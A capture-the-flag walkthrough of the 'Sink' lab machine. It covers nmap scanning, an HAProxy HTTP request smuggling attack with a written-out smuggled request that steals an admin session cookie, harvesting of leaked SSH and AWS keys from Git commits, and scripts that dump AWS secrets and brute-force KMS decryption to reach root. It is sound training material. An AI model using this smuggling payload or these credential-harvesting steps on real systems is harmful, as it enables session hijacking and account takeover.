Sink

Enumeration
As always, we start with the enumeration phase, in which we scan the machine looking for open ports and identify the services and versions running on them.
The following nmap command quickly scans the target machine for open ports and saves the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.225 -oN allPorts
-sS: use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of the nmap timing templates.
-Pn: assume the host is online.
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command scans these ports in more depth and saves the result into a file:
nmap -sC -sV -p22,3000,5000 10.10.10.225 -oN targeted
-sC: performs the scan using the default set of scripts.
-sV: enables version detection.
-oN: saves the scan result into a file, in this case the targeted file.
There are two websites hosted on the server. The one on port 3000 is a Gitea 1.12.6 instance.

The other one on port 5000 shows a login page.

Let's register a new user on this last website.

Once logged in, we'll see a Sink DevOps page.

Exploitation
If we take a look at the response headers, we'll see the Via: haproxy header.
curl http://10.10.10.225:5000 -I
This proxy is vulnerable to HTTP request smuggling, also known as HTTP Desync attacks, as we can see here. Let's test it out. On the main page, we can leave a comment.

Intercept the request with BurpSuite, and remove unnecessary request headers.

The vulnerability occurs when the Transfer-Encoding header is sent together with a vertical tab. To insert the vertical tab into the BurpSuite request, echo it and base64 encode it first:
echo -ne '\x0b' | base64
Then, add the Transfer-Encoding header together with the base64-encoded vertical tab, and base64 decode it in place with BurpSuite's built-in Decoder tool. We can show non-printable characters to make the payload easier to work with. Finally, copy and paste the same request below it and increase the Content-Length header accordingly.
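The resulting request might look roughly like the following sketch. The /comment endpoint, the msg parameter, the cookie value and the Content-Length values are illustrative assumptions (they have to match the actual form and byte counts), and [VT] marks the raw vertical-tab byte pasted from the decoder:

POST /comment HTTP/1.1
Host: 10.10.10.225:5000
Cookie: session=<our session cookie>
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
Transfer-Encoding:[VT]chunked

0

POST /comment HTTP/1.1
Host: 10.10.10.225:5000
Cookie: session=<our session cookie>
Content-Type: application/x-www-form-urlencoded
Content-Length: 150

msg=test

Roughly speaking, HAProxy honours the outer Content-Length and forwards the whole block as one request, while the backend honours the Transfer-Encoding header and stops the first request at the 0 chunk terminator. The leftover POST is incomplete, so the next request that arrives gets appended to it, and its headers, including the Cookie, end up inside the smuggled comment.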

Now, there are two new comments, and the second one has a session cookie different from ours.

Let's change it with the EditThisCookie extension.

If we reload the website, we'll see that we have become the admin@sink.htb user.

Inside the Notes section, we'll see three notes.

All three of them contain credentials.



Back on the Gitea server, we'll see that it has a login page, and the credentials for the root user are the only valid ones.

There are four repositories inside.

The Key_Management repository is owned by marcus.

There are a few commits in the repository.

The Preparing for Prod commit shows an SSH private key in the hidden file .keys/dev_keys.

The .keys/dev_keys file contains the SSH private key.

Let's copy it into the id_rsa file, and give it the right permissions. Then, log in as marcus, and we'll be able to grab the user flag.
nano id_rsa; chmod 600 id_rsa
ssh -i id_rsa marcus@10.10.10.225
Privilege Escalation
Back in the Gitea repositories, the Log_Management repository also has a bunch of commits.

The dev push for log group and stream creation commit contains AWS access keys.

Using these keys, we can try to list the AWS secrets stored on the machine. But first, we need to configure the AWS CLI with them.
aws configure
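The prompts look like the following. The access key values come from the commit (redacted here), and the region and output format are arbitrary assumptions, since the local endpoint does not seem to care about them:

AWS Access Key ID [None]: <AccessKeyId from the commit>
AWS Secret Access Key [None]: <SecretAccessKey from the commit>
Default region name [None]: us-east-1
Default output format [None]: json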
Now, as seen below, there are secrets we can access.
aws --endpoint-url="http://127.0.0.1:4566" secretsmanager list-secrets
We can make a script like the following, which takes the ARN of each secret and lists its contents.
nano /tmp/get_secrets.sh
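A minimal sketch of such a script, assuming jq is available to pull each ARN out of the list-secrets output:

#!/bin/bash
# List every secret ARN and dump the value stored under it.
for arn in $(aws --endpoint-url="http://127.0.0.1:4566" secretsmanager list-secrets | jq -r '.SecretList[].ARN'); do
    aws --endpoint-url="http://127.0.0.1:4566" secretsmanager get-secret-value --secret-id "$arn"
done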
If we run the script, we'll see that each secret has new credentials stored in it.
bash /tmp/get_secrets.sh
The credentials for david are the only ones that work.
su david
There is one directory called Projects in his home directory.
ls -l
This folder contains a file which is encrypted.
ls -lR
We can try to decrypt the file with AWS KMS. But first, we need to configure the AWS CLI again.
aws configure
The following script takes each key stored in AWS KMS and tries to decrypt the servers.enc file with each of the possible encryption algorithms.
nano /tmp/get_keys.sh
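A rough sketch of what that script could look like, assuming jq is available and that it is run from the directory containing servers.enc; the list of algorithms to try is an assumption as well:

#!/bin/bash
# Try to decrypt servers.enc with every KMS key and every encryption algorithm,
# silencing the errors from the combinations that do not match.
for key in $(aws --endpoint-url="http://127.0.0.1:4566" kms list-keys | jq -r '.Keys[].KeyId'); do
    for alg in SYMMETRIC_DEFAULT RSAES_OAEP_SHA_1 RSAES_OAEP_SHA_256; do
        aws --endpoint-url="http://127.0.0.1:4566" kms decrypt \
            --key-id "$key" \
            --encryption-algorithm "$alg" \
            --ciphertext-blob fileb://servers.enc \
            --output text --query Plaintext 2>/dev/null
    done
done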
Run the script, and we'll get a base64 string.
bash /tmp/get_keys.sh
If we take the string, decode it, and put it in a file called content, we'll see that it is a compressed file.
echo 'H4...AAA=' | base64 -d > content
file content
Let's decompress it.
mv content content.gz
gunzip content.gz
tar xf content
It contains the servers.sig and servers.yml files. The servers.yml file contains credentials.
cat servers.yml
These credentials are valid for the root user. So finally, get a shell as root, and then all we have to do is reap the harvest and take the root flag.
su root